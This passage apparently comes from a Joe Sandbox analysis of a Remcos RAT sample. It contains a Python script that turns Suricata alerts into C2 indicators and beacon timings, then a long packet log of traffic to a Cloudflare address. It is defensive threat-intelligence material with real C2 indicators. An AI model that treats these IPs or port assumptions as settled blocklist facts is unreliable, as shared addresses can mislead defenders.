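The alert rows above are the most actionable part of the report: four JA3 hits on the same endpoint on a non-standard port, spaced roughly 23 seconds apart, is the Remcos reconnect loop, while the single 443 hit on the Cloudflare address is the stage download. The script below is an added example (not part of the Joe Sandbox report or its tooling) that turns rows in that field order into a de-duplicated IOC list keyed on destination rather than on the ever-changing ephemeral source port, and computes the spacing between beacons. The input is a constructed, pipe-delimited copy of the five rows; the `COMMON_PORTS` set is an assumption used only to flag unusual destination ports.

```python
"""Derive C2 IOCs and beacon timing from Suricata alert rows.

Added example, not part of the Joe Sandbox report. Input rows are constructed
in the report's column order (timestamp, SID, signature, severity, src IP,
src port, dst IP, dst port, protocol) and pipe-delimited.
"""
from dataclasses import dataclass
from datetime import datetime

# Constructed input: the five alert rows from this report, pipe-delimited.
ALERT_ROWS = """\
2024-12-12T07:54:02.268298+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.7|49946|154.216.18.216|2404|TCP
2024-12-12T07:54:52.755878+0100|2803270|ETPRO MALWARE Common Downloader Header Pattern UHCa|2|192.168.2.7|49776|172.67.216.143|443|TCP
2024-12-12T07:55:17.429700+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.7|49786|154.216.18.216|2404|TCP
2024-12-12T07:55:40.476958+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.7|49841|154.216.18.216|2404|TCP
2024-12-12T07:56:03.524506+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.7|49894|154.216.18.216|2404|TCP
"""

# Assumption for this example: ports where an outbound TLS/HTTP connection is
# unremarkable on its own. A RAT JA3 match on any other port gets flagged.
COMMON_PORTS = {80, 443, 8080, 8443}


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str


def parse_alert(line: str) -> Alert:
    """Split one pipe-delimited row; the timestamp carries a +HHMM offset."""
    ts, sid, sig, sev, sip, sport, dip, dport, proto = line.split("|")
    return Alert(
        ts=datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
        sid=int(sid), signature=sig, severity=int(sev),
        src_ip=sip, src_port=int(sport), dst_ip=dip, dst_port=int(dport),
        proto=proto.lower(),
    )


def parse_alerts(text: str) -> list[Alert]:
    return [parse_alert(l) for l in text.splitlines() if l.strip()]


def c2_endpoints(alerts: list[Alert]) -> dict[tuple[str, int, str], dict]:
    """Group alerts by (dst_ip, dst_port, proto), one entry per endpoint.

    The ephemeral source port changes on every reconnect, so it is deliberately
    left out of the key; otherwise each beacon would look like a new indicator.
    """
    out: dict[tuple[str, int, str], dict] = {}
    for a in sorted(alerts, key=lambda a: a.ts):
        key = (a.dst_ip, a.dst_port, a.proto)
        e = out.setdefault(key, {
            "sids": set(), "signatures": set(), "hits": 0,
            "first_seen": a.ts, "last_seen": a.ts,
            "non_standard_port": a.dst_port not in COMMON_PORTS,
        })
        e["sids"].add(a.sid)
        e["signatures"].add(a.signature)
        e["hits"] += 1
        e["last_seen"] = a.ts
    return out


def beacon_intervals(alerts: list[Alert], sid: int) -> list[float]:
    """Seconds between consecutive hits of one SID.

    Tight, regular spacing is a RAT's reconnect loop, not a user browsing.
    """
    hits = sorted(a.ts for a in alerts if a.sid == sid)
    return [round((b - a).total_seconds(), 2) for a, b in zip(hits, hits[1:])]


def iocs(alerts: list[Alert]) -> list[str]:
    """Flat ip:port/proto lines suitable for a blocklist or IOC feed."""
    lines = []
    for (ip, port, proto), e in c2_endpoints(alerts).items():
        flag = " [non-standard port]" if e["non_standard_port"] else ""
        lines.append(f"{ip}:{port}/{proto} hits={e['hits']} sids={sorted(e['sids'])}{flag}")
    return lines


if __name__ == "__main__":
    alerts = parse_alerts(ALERT_ROWS)
    for line in iocs(alerts):
        print(line)
    print("Remcos JA3 reconnect intervals (s):", beacon_intervals(alerts, 2036594))
```

Running it yields two endpoints: `154.216.18.216:2404/tcp` with four hits and the non-standard-port flag, and `172.67.216.143:443/tcp` with one hit. Blocking the second on its own would be a mistake: it is a Cloudflare address shared by the many unrelated samples listed earlier on this page, so the useful indicator there is the URL or hostname behind it, not the IP.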
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 07:54:09.672216892 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:09.672266960 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:09.672336102 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:09.679029942 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:09.679059029 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:10.901593924 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:10.901671886 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:10.906960964 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:10.906971931 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:10.907262087 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:10.932426929 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:10.979327917 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.563483000 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.563579082 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.563625097 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.563728094 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.563752890 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.563823938 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.564093113 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.564749002 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.564821005 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.564831018 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.578814983 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.578895092 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.578905106 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.587074041 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.587341070 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.587352037 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.627814054 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.682696104 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.737245083 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.737261057 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.759866953 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.759970903 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.759982109 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.767291069 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.767352104 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.767376900 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.774969101 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.775032997 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.775059938 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.782902956 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.783065081 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.783076048 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.790920973 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.791039944 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.791054010 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.846515894 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.911027908 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.911434889 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.911462069 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.911509037 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:11.911530018 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:11.911638021 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.030237913 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.030673027 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.030746937 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.030770063 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.080884933 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.150067091 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.150509119 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.150567055 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.150571108 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.150587082 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.150638103 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.151365995 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.152386904 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.152447939 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.152456999 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.153985023 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.154006958 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.154051065 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.154062033 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.154118061 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.154640913 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.157257080 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.157264948 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.157326937 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.157335043 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.158572912 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.158663034 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.158669949 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.158726931 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.159717083 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.160470963 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.160542965 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.160550117 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.160600901 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.162328005 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.162395000 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.163052082 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.163121939 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.164954901 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.165018082 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.270420074 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.270683050 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.279902935 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.280142069 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.295274019 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.295424938 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.303225994 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.303338051 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.312530041 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.312771082 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.322174072 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.322266102 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.326987982 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.327197075 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.336806059 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.337016106 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.345865011 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.346035957 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.350831985 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.351044893 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.360183001 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.360347986 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.369790077 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.369874001 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.376796961 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.376935005 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.386372089 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.386588097 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.391462088 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.391668081 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.400882959 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.401045084 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.410190105 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.410383940 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.415345907 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.416405916 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.424556017 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.424678087 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.434329987 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.434412003 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.438973904 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.439095974 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.448510885 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.448623896 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.457837105 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.458005905 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.467370033 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.467503071 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.474504948 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.474709034 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.479701996 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.479767084 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.488313913 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.488440990 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.496563911 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.496660948 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.500847101 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.500922918 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.508255005 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.508533001 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.515331030 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.515479088 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.522303104 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.522427082 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.525933981 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.526066065 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.530869007 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.530951977 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.542650938 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.542675018 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.542735100 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.542790890 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.542810917 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.542845964 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.543389082 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.553181887 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.553205013 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.553395987 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.553395987 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.553415060 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.557110071 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.565054893 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.565076113 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.565460920 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.565474033 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.565880060 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.575908899 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.575926065 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.576141119 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.576153040 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.576478004 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.587477922 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.587495089 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.588040113 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.588053942 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.588311911 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.599155903 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.599180937 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.599280119 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.599293947 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.599334955 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.599565029 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.604196072 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.604363918 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.604377985 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.609272003 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.609589100 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.609597921 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.623615980 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.623639107 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:12.623797894 CET | 49699 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:12.623811007 CET | 443 | 49699 | 172.67.216.143 | 192.168.2.7
                                          Dec 12, 2024 07:54:12.636298895 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.636317015 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.636466980 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.636478901 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.642262936 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.642399073 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.642410994 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.651956081 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.651973009 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.652009964 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.652059078 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.652072906 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.652123928 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.662050009 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.662065983 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.662103891 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.662194967 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.662206888 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.662240028 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.670572042 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.670588017 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.670624971 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.670671940 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.670686007 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.671042919 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.718714952 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.718736887 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.718812943 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.718874931 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.718892097 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.718933105 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.723995924 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724004984 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724046946 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724085093 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724107027 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724143982 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724153996 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.724153996 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.724170923 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724198103 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.724267006 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.729254007 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729304075 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729325056 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729360104 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729417086 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.729429960 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729439974 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.729439974 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.730155945 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.730287075 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.730330944 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.730866909 CET49699443192.168.2.7172.67.216.143
